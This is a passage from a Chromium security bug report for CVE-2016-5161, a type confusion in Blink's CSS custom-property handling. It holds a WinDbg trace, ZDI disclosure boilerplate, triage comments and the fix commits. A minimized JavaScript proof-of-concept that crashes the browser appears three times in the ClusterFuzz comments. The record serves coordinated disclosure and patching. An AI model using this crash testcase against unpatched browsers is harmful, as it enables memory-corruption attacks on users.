chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x8c:
00007ffd`e3af62f8 488b4de0        mov     rcx,qword ptr [rbp-20h] ss:00000012`f836bda0=000004f29c0780f0
0:000> t
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x90:
00007ffd`e3af62fc ba3a000000      mov     edx,3Ah
0:000> t
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x95:
00007ffd`e3af6301 885538          mov     byte ptr [rbp+38h],dl ss:00000012`f836bdf8=20
0:000> t
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x98:
00007ffd`e3af6304 4885c9          test    rcx,rcx
0:000> t
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x9b:
00007ffd`e3af6307 742a            je      chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0xc7 (00007ffd`e3af6333) [br=0]
0:000> t
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x9d:
00007ffd`e3af6309 8b45f0          mov     eax,dword ptr [rbp-10h] ss:00000012`f836bdb0=00000021
0:000> t
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0xa0:
00007ffd`e3af630c 3b4104          cmp     eax,dword ptr [rcx+4] ds:000004f2`9c0780f4=00000021
0:000> t
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0xa3:
00007ffd`e3af630f 7322            jae     chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0xc7 (00007ffd`e3af6333) [br=1]
0:000> t
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0xc7:
00007ffd`e3af6333 458bc7          mov     r8d,r15d
0:000> t
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0xca:
00007ffd`e3af6336 488d5538        lea     rdx,[rbp+38h]
0:000> t
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0xce:
00007ffd`e3af633a 488d4dd8        lea     rcx,[rbp-28h]
0:000> t
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0xd2:
00007ffd`e3af633e e8354771fe      call    chrome_child!WTF::StringBuilder::append (00007ffd`e220aa78)
0:000> p
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0xd7:
00007ffd`e3af6343 488d5528        lea     rdx,[rbp+28h]
0:000> t
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0xdb:
00007ffd`e3af6347 488bcb          mov     rcx,rbx
0:000> t
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0xde:
00007ffd`e3af634a e8194ffaff      call    chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText (00007ffd`e3a9b268)
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText:
00007ffd`e3a9b268 4053            push    rbx
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x2:
00007ffd`e3a9b26a 4883ec30        sub     rsp,30h
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x6:
00007ffd`e3a9b26e 488bda          mov     rbx,rdx
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x9:
00007ffd`e3a9b271 488b5110        mov     rdx,qword ptr [rcx+10h] ds:000003f6`9bc83a88=0000000000000000
0:000> dq @rcx
000003f6`9bc83a78  00000000`00008000 0000023f`c54531a8
000003f6`9bc83a88  00000000`00000000 00000000`00000000
000003f6`9bc83a98  00000000`00000000 00000000`00000000
000003f6`9bc83aa8  00000000`00000000 00000000`00000000
000003f6`9bc83ab8  00000000`00000000 00000000`00000000
000003f6`9bc83ac8  00000000`00000000 00000000`00000000
000003f6`9bc83ad8  00000000`00000000 00000000`00000000
000003f6`9bc83ae8  00000000`00000000 00000000`00000000
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0xd:
00007ffd`e3a9b275 4885d2          test    rdx,rdx
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x10:
00007ffd`e3a9b278 7428            je      chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x3a (00007ffd`e3a9b2a2) [br=1]
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x3a:
00007ffd`e3a9b2a2 e86df177fe      call    chrome_child!WTF::emptyString (00007ffd`e221a414)
0:000> p
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x3f:
00007ffd`e3a9b2a7 488b08          mov     rcx,qword ptr [rax] ds:0000023f`c5410090=000004f29c004000
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x42:
00007ffd`e3a9b2aa 48890b          mov     qword ptr [rbx],rcx ds:00000012`f836bde8=0000000000000000
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x45:
00007ffd`e3a9b2ad 4885c9          test    rcx,rcx
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x48:
00007ffd`e3a9b2b0 7402            je      chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x4c (00007ffd`e3a9b2b4) [br=0]
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x4a:
00007ffd`e3a9b2b2 ff01            inc     dword ptr [rcx] ds:000004f2`9c004000=0000004a
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x4c:
00007ffd`e3a9b2b4 488bc3          mov     rax,rbx
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x4f:
00007ffd`e3a9b2b7 4883c430        add     rsp,30h
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x53:
00007ffd`e3a9b2bb 5b              pop     rbx
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x54:
00007ffd`e3a9b2bc c3              ret
0:000> bl
 0 e 00007ffd`e3b20b8f     0001 (0004)  0:**** chrome_child!blink::CSSPropertyParser::parseValueStart+0x57
 1 e 00007ffd`e3af62be     0001 (0001)  0:**** chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x52
 2 e 0000023f`c54531b4 r 1 0001 (0001)  0:**** 
 3 e 00007ffd`e3cb3a94     0001 (0001)  0:**** chrome_child!blink::ChromeClient::openJavaScriptAlert
0:000> bd 0-2
0:000> g
Breakpoint 3 hit
chrome_child!blink::ChromeClient::openJavaScriptAlert:
00007ffd`e3cb3a94 4053            push    rbx
0:000> db poi(@r8)+c
000004f2`9c1a416c  3c 00 66 00 69 00 67 00-75 00 72 00 65 00 20 00  <.f.i.g.u.r.e. .
000004f2`9c1a417c  73 00 74 00 79 00 6c 00-65 00 3d 00 22 00 66 00  s.t.y.l.e.=.".f.
000004f2`9c1a418c  6c 00 6f 00 61 00 74 00-3a 00 20 00 76 00 61 00  l.o.a.t.:. .v.a.
000004f2`9c1a419c  72 00 28 00 2d 00 2d 00-43 00 43 00 43 00 43 00  r.(.-.-.C.C.C.C.
000004f2`9c1a41ac  29 00 3b 00 20 00 f2 04-00 00 00 e5 00 9c f2 04  ).;. ...........
000004f2`9c1a41bc  00 00 04 00 00 00 50 00-57 00 4e 00 45 00 44 00  ......P.W.N.E.D.
000004f2`9c1a41cc  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
000004f2`9c1a41dc  00 00 00 00 02 3f c5 45-32 18 00 00 00 00 00 00  .....?.E2.......
0:000> vertarget
Windows 10 Version 10586 MP (4 procs) Free x64
Product: WinNt, suite: SingleUserTS
kernelbase.dll version: 10.0.10586.306 (th2_release_sec.160422-1850)
Machine Name:
Debug session time: Tue Jun 14 17:57:03.575 2016 (UTC - 5:00)
System Uptime: 0 days 4:59:37.015
Process Uptime: 0 days 0:05:01.854
  Kernel time: 0 days 0:00:00.109
  User time: 0 days 0:00:00.187
```

-- CREDIT ---------------------------------------

This vulnerability was discovered by:

   62600BCA031B9EB5CB4A74ADDDD6771E working with Trend Micro's Zero Day Initiative

-- FURTHER DETAILS ------------------------------

If supporting files were contained with this report they are provided within a password protected ZIP file. The password is the ZDI candidate number in the form: ZDI-CAN-XXXX where XXXX is the ID number.

Please confirm receipt of this report. We expect all vendors to remediate ZDI vulnerabilities within 120 days of the reported date. If you are ready to release a patch at any point leading up to the deadline, please coordinate with us so that we may release our advisory detailing the issue. If the 120-day deadline is reached and no patch has been made available we will release a limited public advisory with our own mitigations, so that the public can protect themselves in the absence of a patch. Please keep us updated regarding the status of this issue and feel free to contact us at any time:

Zero Day Initiative
zdi-disclosures@trendmicro.com

The PGP key used for all ZDI vendor communications is available from:

     http://www.zerodayinitiative.com/documents/disclosures-pgp-key.asc

-- INFORMATION ABOUT THE ZDI ---------------------

Established by TippingPoint and acquired by Trend Micro, the Zero Day Initiative (ZDI) neither re-sells vulnerability details nor exploit code. Instead, upon notifying the affected product vendor, the ZDI provides its Trend Micro TippingPoint customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available.

Please contact us for further details or refer to:

    http://www.zerodayinitiative.com

-- DISCLOSURE POLICY ----------------------------

Our vulnerability disclosure policy is available online at:

    http://www.zerodayinitiative.com/advisories/disclosure_policy/
 

Comment 1 by zdi-disc...@hp.com, Jun 22 2016

ZDI-CAN-3840.zip
498 bytes Download

Comment 2 by ClusterFuzz, Jun 22 2016

Project Member
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://cluster-fuzz.appspot.com/testcase?key=6340138707976192

Comment 3 by dominickn@chromium.org, Jun 22 2016

Cc: timloh@chromium.org
Components: Blink>CSS
Owner: alancutter@chromium.org
Status: Assigned (was: Unconfirmed)
Looks like the code in question came from crrev.com/1405293012. +alancutter and +timloh, who reviewed the CL. Can you take a look at this and verify if it's an issue?

Comment 4 by dominickn@chromium.org, Jun 22 2016

Summary: Security: Type confusion in StylePropertySerializer::getCustomPropertyText. (was: Security: )

Comment 5 by dominickn@chromium.org, Jun 24 2016

Labels: Security_Severity-Medium Security_Impact-Stable
Tentatively assigning labels

Comment 6 by dominickn@chromium.org, Jun 24 2016

Cc: -timloh@chromium.org shans@chromium.org alancutter@chromium.org
Owner: timloh@chromium.org
alancutter@ is away for the next week. Reassigning to timloh - can you have a look at this and triage?

Comment 7 by ClusterFuzz, Jun 24 2016

Project Member
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://cluster-fuzz.appspot.com/testcase?key=5690139632467968

Comment 8 by sheriffbot@chromium.org, Jun 24 2016

Project Member
Labels: Pri-1

Comment 9 by dominickn@chromium.org, Jun 26 2016

Labels: M-53

Comment 10 by timloh@chromium.org, Jun 27 2016

Components: Blink>Editing
mergeStyle() looks like it handles custom properties badly. Doesn't seem to repro in ToT, not sure why. Will look more into this later.

Comment 11 by timloh@chromium.org, Jun 29 2016

Cc: yosin@chromium.org

Comment 12 by yosin@chromium.org, Jul 5 2016

Labels: OS-Windows
I could re-produce this with poc2.html attached in CF Crash Report at #c7 with today's ToT.

This is DCHECK() in toCSSCustomPropertyDeclaration() call, where |property.value().m_class| is VariableReferenceClass(32) instead of CustomPropertyDeclarationClass.

I'm not sure whether VariableReferenceClass implies CustomPropertyDeclarationClass or not.


bool MutableStylePropertySet::setProperty(const CSSProperty& property, CSSProperty* slot)
{
    if (!removeShorthandProperty(property.id())) {
        const AtomicString& name = (property.id() == CSSPropertyVariable) ?
            toCSSCustomPropertyDeclaration(property.value())->name() : nullAtom;

Comment 13 by ClusterFuzz, Jul 6 2016

Project Member
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://cluster-fuzz.appspot.com/testcase?key=5368642518908928

Comment 14 by ClusterFuzz, Jul 6 2016

Project Member
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5368642518908928

Job Type: linux_asan_chrome_mp
Platform Id: linux

Crash Type: ASSERT
Crash Address: 
Crash State:
  !value || (value->isCustomPropertyDeclaration())
  blink::MutableStylePropertySet::setProperty
  blink::MutableStylePropertySet::addParsedProperties
  
Regressed: https://cluster-fuzz.appspot.com/revisions?job=linux_asan_chrome_mp&range=365683:366004

Minimized Testcase (0.67 Kb):
Download: https://cluster-fuzz.appspot.com/download/AMIfv94T5Yq8K67FKD5FPNGltSu9r7Zubq14IMGSBsv8DyCPfvpS9g3ACgRgx4s1ZjbygrfqGgzwANriIhIxmQFs7XVSR8qYrykNlJdUwNHUd-xZsec8eV4jl8nUDa2JHYxhYREWmgLIAvwnIe3B-td_L8v88kODDg?testcase_id=5368642518908928
<script> 
document.documentElement.contentEditable="true" 
document.documentElement.appendChild(document.createElement('table'))
eAcronym = document.createElement('acronym') 
document.documentElement.appendChild(eAcronym) 
document.documentElement.appendChild(document.createElement('keygen'))
newElem = document.createElement('figure') 
newElem.style.cssText = '--AAAA: var(--BBBB)' 
document.documentElement.appendChild(newElem) 
eCite = document.createElement('cite') 
eCite.style.cssText = 'float: var(--CCCC)' 
eAcronym.appendChild(eCite)
eCite.appendChild(document.createElement('marquee')); 
document.execCommand('SelectAll') 
document.execCommand('RemoveFormat') 
</script>


See https://dev.chromium.org/Home/chromium-security/bugs/reproducing-clusterfuzz-bugs for more information.

Comment 15 by sheriffbot@chromium.org, Jul 13 2016

Project Member
timloh: Uh oh! This issue still open and hasn't been updated in the last 14 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers?

If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one?

If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started.

Thanks for your time! To disable nags, add the Disable-Nags label.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 16 by sheriffbot@chromium.org, Jul 27 2016

Project Member
timloh: Uh oh! This issue still open and hasn't been updated in the last 28 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers?

If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one?

If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started.

Thanks for your time! To disable nags, add the Disable-Nags label.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 17 by bugdroid1@chromium.org, Aug 9 2016

Project Member
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/aadb63893e4c1358d1e5139aa29552eb190682c8

commit aadb63893e4c1358d1e5139aa29552eb190682c8
Author: timloh <timloh@chromium.org>
Date: Tue Aug 09 08:19:22 2016

Fix EditingStyle::mergeStyle()'s handling of custom properties

This patch fixes the logic of EditingStyle::mergeStyle() to correctly
handle custom properties. Currently it serializes the CSSValue and then
reparses it, which, aside from being inefficient, doesn't work for
custom properties as the custom property name is lost (since we only
have the enum value CSSPropertyVariable).

BUG= 622420 

Review-Url: https://codereview.chromium.org/2103043004
Cr-Commit-Position: refs/heads/master@{#410614}

[modify] https://crrev.com/aadb63893e4c1358d1e5139aa29552eb190682c8/third_party/WebKit/Source/core/core.gypi
[modify] https://crrev.com/aadb63893e4c1358d1e5139aa29552eb190682c8/third_party/WebKit/Source/core/css/StylePropertySet.cpp
[modify] https://crrev.com/aadb63893e4c1358d1e5139aa29552eb190682c8/third_party/WebKit/Source/core/editing/EditingStyle.cpp
[modify] https://crrev.com/aadb63893e4c1358d1e5139aa29552eb190682c8/third_party/WebKit/Source/core/editing/EditingStyle.h
[add] https://crrev.com/aadb63893e4c1358d1e5139aa29552eb190682c8/third_party/WebKit/Source/core/editing/EditingStyleTest.cpp

Comment 18 by ClusterFuzz, Aug 10 2016

Project Member
ClusterFuzz has detected this issue as fixed in range 410604:410621.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5690139632467968

Job Type: linux_asan_chrome_mp
Platform Id: linux

Crash Type: 
Crash Address: 
Crash State:
  
Fixed: https://cluster-fuzz.appspot.com/revisions?job=linux_asan_chrome_mp&range=410604:410621

Unminimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv962bJmF4zCnXnYhCsNwGmpOsoyg_7y-hF-5IruojcMrjlEiXI4QncSyk_zgZ4ntVVap84IqTY30vDXdTscTiROgCL8PhmVfYYuVq49UoyPo18gZkr8bAlg7hJt9Wv-4R2PLM7svT_iYTbe_mRGu7sWzMxHz1w?testcase_id=5690139632467968


See https://dev.chromium.org/Home/chromium-security/bugs/reproducing-clusterfuzz-bugs for more information.

If you suspect that the result above is incorrect, try re-doing that job on the test case report page.

Comment 19 by och...@chromium.org, Aug 10 2016

Status: Fixed (was: Assigned)
Fixed as per #18.

Comment 20 by ClusterFuzz, Aug 10 2016

Project Member
ClusterFuzz has detected this issue as fixed in range 410604:410621.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5368642518908928

Job Type: linux_asan_chrome_mp
Platform Id: linux

Crash Type: ASSERT
Crash Address: 
Crash State:
  !value || (value->isCustomPropertyDeclaration())
  blink::MutableStylePropertySet::setProperty
  blink::MutableStylePropertySet::addParsedProperties
  
Regressed: https://cluster-fuzz.appspot.com/revisions?job=linux_asan_chrome_mp&range=365683:366004
Fixed: https://cluster-fuzz.appspot.com/revisions?job=linux_asan_chrome_mp&range=410604:410621

Minimized Testcase (0.67 Kb):
Download: https://cluster-fuzz.appspot.com/download/AMIfv94T5Yq8K67FKD5FPNGltSu9r7Zubq14IMGSBsv8DyCPfvpS9g3ACgRgx4s1ZjbygrfqGgzwANriIhIxmQFs7XVSR8qYrykNlJdUwNHUd-xZsec8eV4jl8nUDa2JHYxhYREWmgLIAvwnIe3B-td_L8v88kODDg?testcase_id=5368642518908928
<script> 
document.documentElement.contentEditable="true" 
document.documentElement.appendChild(document.createElement('table'))
eAcronym = document.createElement('acronym') 
document.documentElement.appendChild(eAcronym) 
document.documentElement.appendChild(document.createElement('keygen'))
newElem = document.createElement('figure') 
newElem.style.cssText = '--AAAA: var(--BBBB)' 
document.documentElement.appendChild(newElem) 
eCite = document.createElement('cite') 
eCite.style.cssText = 'float: var(--CCCC)' 
eAcronym.appendChild(eCite)
eCite.appendChild(document.createElement('marquee')); 
document.execCommand('SelectAll') 
document.execCommand('RemoveFormat') 
</script>


See https://dev.chromium.org/Home/chromium-security/bugs/reproducing-clusterfuzz-bugs for more information.

If you suspect that the result above is incorrect, try re-doing that job on the test case report page.

Comment 21 by ClusterFuzz, Aug 10 2016

Project Member
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5368642518908928

Job Type: linux_asan_chrome_mp
Platform Id: linux

Crash Type: ASSERT
Crash Address: 
Crash State:
  !value || (value->isCustomPropertyDeclaration())
  blink::MutableStylePropertySet::setProperty
  blink::MutableStylePropertySet::addParsedProperties
  
Regressed: https://cluster-fuzz.appspot.com/revisions?job=linux_asan_chrome_mp&range=365683:366004
Fixed: https://cluster-fuzz.appspot.com/revisions?job=linux_asan_chrome_mp&range=410604:410621

Minimized Testcase (0.67 Kb):
Download: https://cluster-fuzz.appspot.com/download/AMIfv94T5Yq8K67FKD5FPNGltSu9r7Zubq14IMGSBsv8DyCPfvpS9g3ACgRgx4s1ZjbygrfqGgzwANriIhIxmQFs7XVSR8qYrykNlJdUwNHUd-xZsec8eV4jl8nUDa2JHYxhYREWmgLIAvwnIe3B-td_L8v88kODDg?testcase_id=5368642518908928
<script> 
document.documentElement.contentEditable="true" 
document.documentElement.appendChild(document.createElement('table'))
eAcronym = document.createElement('acronym') 
document.documentElement.appendChild(eAcronym) 
document.documentElement.appendChild(document.createElement('keygen'))
newElem = document.createElement('figure') 
newElem.style.cssText = '--AAAA: var(--BBBB)' 
document.documentElement.appendChild(newElem) 
eCite = document.createElement('cite') 
eCite.style.cssText = 'float: var(--CCCC)' 
eAcronym.appendChild(eCite)
eCite.appendChild(document.createElement('marquee')); 
document.execCommand('SelectAll') 
document.execCommand('RemoveFormat') 
</script>


See https://dev.chromium.org/Home/chromium-security/bugs/reproducing-clusterfuzz-bugs for more information.

Comment 22 by sheriffbot@chromium.org, Aug 10 2016

Project Member
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify

Comment 23 by awhalley@chromium.org, Aug 10 2016

Labels: Merge-Request-53

Comment 24 by dimu@chromium.org, Aug 10 2016

Labels: -Merge-Request-53 Merge-Approved-53 Hotlist-Merge-Approved
Your change meets the bar and is auto-approved for M53 (branch: 2785)

Comment 25 by gov...@chromium.org, Aug 11 2016

Please merge your change to M53 branch 2785 ASAP (latest before 5:00 PM PT, Friday 08/12) so we can take it in for next week beta. Thank you.

Comment 26 by bugdroid1@chromium.org, Aug 12 2016

Project Member
Labels: -merge-approved-53 merge-merged-2785
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/ed9e60bc6238f29c78a85229e57a07256c4f66e4

commit ed9e60bc6238f29c78a85229e57a07256c4f66e4
Author: Timothy Loh <timloh@chromium.org>
Date: Fri Aug 12 04:33:40 2016

Fix EditingStyle::mergeStyle()'s handling of custom properties

This patch fixes the logic of EditingStyle::mergeStyle() to correctly
handle custom properties. Currently it serializes the CSSValue and then
reparses it, which, aside from being inefficient, doesn't work for
custom properties as the custom property name is lost (since we only
have the enum value CSSPropertyVariable).

BUG= 622420 

Review-Url: https://codereview.chromium.org/2103043004
Cr-Commit-Position: refs/heads/master@{#410614}
(cherry picked from commit aadb63893e4c1358d1e5139aa29552eb190682c8)

Review URL: https://codereview.chromium.org/2245573002 .

Cr-Commit-Position: refs/branch-heads/2785@{#574}
Cr-Branched-From: 68623971be0cfc492a2cb0427d7f478e7b214c24-refs/heads/master@{#403382}

[modify] https://crrev.com/ed9e60bc6238f29c78a85229e57a07256c4f66e4/third_party/WebKit/Source/core/core.gypi
[modify] https://crrev.com/ed9e60bc6238f29c78a85229e57a07256c4f66e4/third_party/WebKit/Source/core/css/StylePropertySet.cpp
[modify] https://crrev.com/ed9e60bc6238f29c78a85229e57a07256c4f66e4/third_party/WebKit/Source/core/editing/EditingStyle.cpp
[modify] https://crrev.com/ed9e60bc6238f29c78a85229e57a07256c4f66e4/third_party/WebKit/Source/core/editing/EditingStyle.h
[add] https://crrev.com/ed9e60bc6238f29c78a85229e57a07256c4f66e4/third_party/WebKit/Source/core/editing/EditingStyleTest.cpp

Comment 27 by awhalley@chromium.org, Aug 24 2016

Labels: reward-topanel

Comment 28 by awhalley@chromium.org, Aug 24 2016

Labels: -reward-topanel reward-ineligible

Comment 29 by awhalley@chromium.org, Aug 26 2016

Labels: Release-0-M53

Comment 30 by awhalley@chromium.org, Sep 14 2016

Labels: CVE-2016-5161

Comment 31 by sheriffbot@chromium.org, Nov 16 2016

Project Member
Labels: -Restrict-View-SecurityNotify allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 32 by awhalley@chromium.org, Apr 25 2018

Labels: CVE_description-submitted

Sign in to add a comment